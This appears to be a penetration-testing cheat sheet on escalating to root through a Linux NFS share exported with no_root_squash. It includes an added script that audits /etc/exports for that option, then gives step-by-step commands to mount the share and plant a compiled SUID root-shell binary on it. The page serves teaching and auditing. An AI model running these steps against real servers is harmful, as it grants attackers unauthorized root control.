# NFS

### Overview

**NFS (Network File System)** allows one Linux machine to share directories with another over the network.

Commonly used for:

* Shared storage
* Backups

### Why this Works

The key issue is a dangerous NFS export option:

```
no_root_squash
```

Normally, NFS applies:

```
root_squash
```

This means:

* If root connects remotely → it is mapped to a low-privileged user (typically `nobody`)
* Prevents remote root from acting as real root on the server

But with `no_root_squash`, remote root = real root on the NFS share.

So if you:

1. Gain root on a client machine
2. Mount the NFS share
3. Create a SUID root binary inside the share

When that binary is executed on the server, it runs as **root**.

### Prerequisites

For NFS SUID PrivEsc to work:

* An NFS share is exported with:
  * `rw`
  * `no_root_squash`
* You can mount the share
* You have root access on the client machine
* The mounted directory is accessible on the target system
* SUID bit execution is allowed on the mounted filesystem
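
On the server side, the export options in these prerequisites can be audited directly from the exports file. The script below is an added example, not part of the original checklist; the function name `audit_exports` and the HIGH/WARN labels are assumptions of this example, and it assumes export paths contain no spaces.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): audit an exports(5) file for
# entries that disable root squashing.
# Assumption: export paths contain no spaces (quoted paths are not handled).
# Usage: audit_exports /etc/exports

# audit_exports FILE
# Prints one tab-separated line per finding: SEVERITY, path, client, options.
#   HIGH = rw + no_root_squash (the combination listed in the prerequisites)
#   WARN = no_root_squash on a read-only export
# Exit status: 1 if anything was flagged, 0 if the file is clean.
audit_exports() {
    awk '
    /\\$/ { sub(/\\$/, ""); buf = buf $0 " "; next }   # join continuation lines
    {
        line = buf $0; buf = ""
        sub(/#.*/, "", line)                            # drop comments
        n = split(line, f)
        if (n < 1) next
        defaults = ""
        for (i = 2; i <= n; i++) {
            if (f[i] ~ /^-/) { defaults = substr(f[i], 2); continue }
            client = f[i]; opts = ""
            p = index(f[i], "(")
            if (p > 0) {
                client = substr(f[i], 1, p - 1)
                opts = substr(f[i], p + 1)
                sub(/\).*/, "", opts)
            }
            if (client == "") client = "*"              # "(opts)" alone = any host
            eff = defaults (defaults != "" && opts != "" ? "," : "") opts
            squash = 1; rw = 0                          # exports(5) defaults: root_squash, ro
            m = split(eff, o, ",")
            for (j = 1; j <= m; j++) {                  # later options override earlier ones
                if (o[j] == "no_root_squash") squash = 0
                else if (o[j] == "root_squash") squash = 1
                else if (o[j] == "rw") rw = 1
                else if (o[j] == "ro") rw = 0
            }
            if (!squash) {
                printf "%s\t%s\t%s\t%s\n", (rw ? "HIGH" : "WARN"), f[1], client, eff
                found = 1
            }
        }
    }
    END { exit found ? 1 : 0 }
    ' "$1"
}
```
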

### Steps

1. Enumerate NFS Shares:

   ```bash
   # On the victim machine
   cat /etc/exports
   # On the attacker machine
   showmount -e <VICTIM_IP>
   ```
2. Mount the NFS share:

   ```bash
   mkdir -p /mnt/nfs
   mount -o rw,vers=3 <VICTIM_IP>:/export /mnt/nfs
   ```
3. Create a simple C file and compile it:

   ```c
   #include <stdio.h>
   #include <stdlib.h>
   #include <unistd.h>

   int main() {
       setuid(0);
       setgid(0);
       system("/bin/bash");
       return 0;
   }
   ```

   ```bash
   # Write the binary onto the mounted share under the name used in the next steps
   gcc shell.c -o /mnt/nfs/shell.elf
   ```

4. Make it a SUID Binary:

   ```bash
   chmod +xs /mnt/nfs/shell.elf
   ```
5. On the victim machine, execute the ELF file:

   ```bash
   /export/shell.elf
   ```

